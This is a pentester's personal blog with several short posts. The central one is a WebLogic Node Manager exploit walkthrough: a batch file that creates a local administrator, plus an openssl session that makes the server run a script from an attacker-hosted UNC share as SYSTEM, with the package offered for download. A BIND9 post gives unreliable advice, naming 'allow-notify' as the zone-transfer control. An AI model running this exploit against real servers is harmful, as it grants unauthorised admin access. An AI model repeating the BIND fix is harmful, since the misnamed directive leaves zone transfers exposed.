Finally, dmcdonald.net has some IPv6 goodness.

$ nslookup dmcdonald.net
Non-authoritative answer:
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

Name:    dmcdonald.net
Addresses:  2001:41c8:1:6340::a2
212.110.191.162

The Pentester’s Guide to Akamai

Through my employer, NCC Group PLC, I’ve just released an interesting paper on Akamai, which includes a number of ways of going about attacking a website using Akamai. Its my first, but I am quite pleased with it. Check it out at http://www.nccgroup.com/en/blog/2013/03/the-pentester’s-guide-to-akamai/

Zone Transfers are Allowed by Default by BIND9?

Setup my first bind servers in ~9 years. After setting up the primary to accept zone transfers from the slave, and configuring the slave to use the primary as a master I thought id better double check zone transfers were not possible from any random IP address.

The master DNS server rejected the requests as expected, but the slave happily served up the zone to anyone who requested it. After a bit of reading was rather surprised to find out that binds default behaviour for zone transfers is equivalent to

allow-notify (any;);

I guess I was not security conscious enough ~9 years ago to care if someone could do a zone transfer, as I figure I would remembered something like this. Adding the following line to my zone sorted it out, but I’m still kind of shocked this is default behaviour.

allow-notify (none;);

Oracle Web Logic Node Manager UNC Path Remote File Execution

Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.

The file traversal one is rubbish as you can’t specify any command line arguments AFAIK (Do tell me if I’m wrong, please).

The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the following…

@ECHO OFF

net user /add wlcetest WLCETest99*
net localgroup administrators /add wlcetest

The username and password for the wl domain is weblogic / w3bl0g1c.

Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.

Here it is in action..

user@host:~$ openssl s_client -connect 192.168.0.1:5556
CONNECTED(00000003)
<snip>

hello
+OK Node manager v10.3 started
domain cetest1 \\192.168.0.2\share
+OK Current domain set to ‘cetest1′
execscript addlocaladmin.bat
+OK Script ‘addlocaladmin.bat’ executed

Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.

Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique can’t find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.

Portraits for Traveller

Been really struggling to find pictures suitable for my Monday night traveller game. I got so fed up I signed up for a free account on EVE online and used their awesome character builder, alt-PrintScreen, and mspaint to knock some up.

http://dmcdonald.net/scifi-avatars/

Not bad, eh?

First Post

Using a new website, and rather bravely (stupidly?) using word press. Just in the process of moving all the old content over.